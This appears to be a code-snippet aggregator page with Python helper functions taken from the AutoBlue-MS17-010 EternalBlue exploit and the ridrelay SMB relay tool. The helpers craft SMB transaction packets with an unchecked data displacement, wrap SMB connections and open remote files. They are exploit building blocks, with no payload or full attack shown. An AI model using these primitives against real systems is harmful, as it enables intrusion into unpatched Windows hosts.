    header['ParameterCount'] = 0
    header['ParameterOffset'] = 0
    header['DataCount'] = data_len
    header['DataOffset'] = fixedOffset + pad2Len
    header['DataDisplacement'] = displacement

    body = transCommand['Data']
    body['Pad1'] = ''
    body['Pad2'] = '\xFF' * pad2Len
    body['Trans_Parameters'] = ''
    body['Trans_Data'] = data

    pkt = smb.NewSMBPacket()
    pkt['Tid'] = tid
    pkt.addCommand(transCommand)
    conn.sendSMB(pkt)
Example #28
Source File: eternalblue_exploit10.py    From AutoBlue-MS17-010 with MIT License 5 votes vote down vote up
def send_trans2_second(conn, tid, data, displacement):
    """Transmit a data-only SMB_COM_TRANSACTION2_SECONDARY on tree ``tid``.

    Parameter counts and the parameter offset are fixed at 0. The data
    counts are ``len(data)`` and DataDisplacement is the caller's
    ``displacement``, written without any check. When data is present it is
    aligned to four bytes with 0xFF padding. The reply is not read here.
    """
    fixedOffset = 32+3+18

    if len(data) == 0:
        padding = ''
        pad2Len = 0
    else:
        pad2Len = (4 - fixedOffset % 4) % 4
        padding = '\xFF' * pad2Len

    request = smb.NewSMBPacket()
    request['Tid'] = tid

    # assume no params
    secondary = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)
    secondary['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()
    secondary['Data'] = smb.SMBTransaction2Secondary_Data()

    for field, value in (
        ('TotalParameterCount', 0),
        ('TotalDataCount', len(data)),
        ('ParameterCount', 0),
        ('ParameterOffset', 0),
        ('DataCount', len(data)),
        ('DataOffset', fixedOffset + pad2Len),
        ('DataDisplacement', displacement),
    ):
        secondary['Parameters'][field] = value

    for field, value in (
        ('Pad1', ''),
        ('Pad2', padding),
        ('Trans_Parameters', ''),
        ('Trans_Data', data),
    ):
        secondary['Data'][field] = value

    request.addCommand(secondary)
    conn.sendSMB(request)
Example #29
Source File: ridrelay.py    From ridrelay with GNU General Public License v3.0 5 votes vote down vote up
def __init__(self, config, SMBClient, username):
    """Set up the daemon thread around an SMB client.

    A low-level ``smb.SMB`` or ``smb3.SMB3`` client is wrapped in an
    ``SMBConnection``; any other object is stored as it is. ``username`` is
    accepted but not used in this constructor.
    """
    Thread.__init__(self)
    self.daemon = True
    needs_wrapping = isinstance(SMBClient, (smb.SMB, smb3.SMB3))
    self.__SMBConnection = (
        SMBConnection(existingConnection=SMBClient) if needs_wrapping else SMBClient
    )
    self.config = config
Example #30
Source File: mysmb.py    From AutoBlue-MS17-010 with MIT License 5 votes vote down vote up
def nt_create_andx(self, tid, filename, smb_packet=None, cmd=None, shareAccessMode=smb.FILE_SHARE_READ|smb.FILE_SHARE_WRITE, disposition=smb.FILE_OPEN, accessMask=0x2019f):
    """Open ``filename`` on tree ``tid`` and remember the returned file id.

    Delegates to ``smb.SMB.nt_create_andx`` with the arguments unchanged and
    stores its result in ``self._last_fid`` before returning it.
    """
    file_id = smb.SMB.nt_create_andx(self, tid, filename, smb_packet, cmd, shareAccessMode, disposition, accessMask)
    self._last_fid = file_id
    return self._last_fid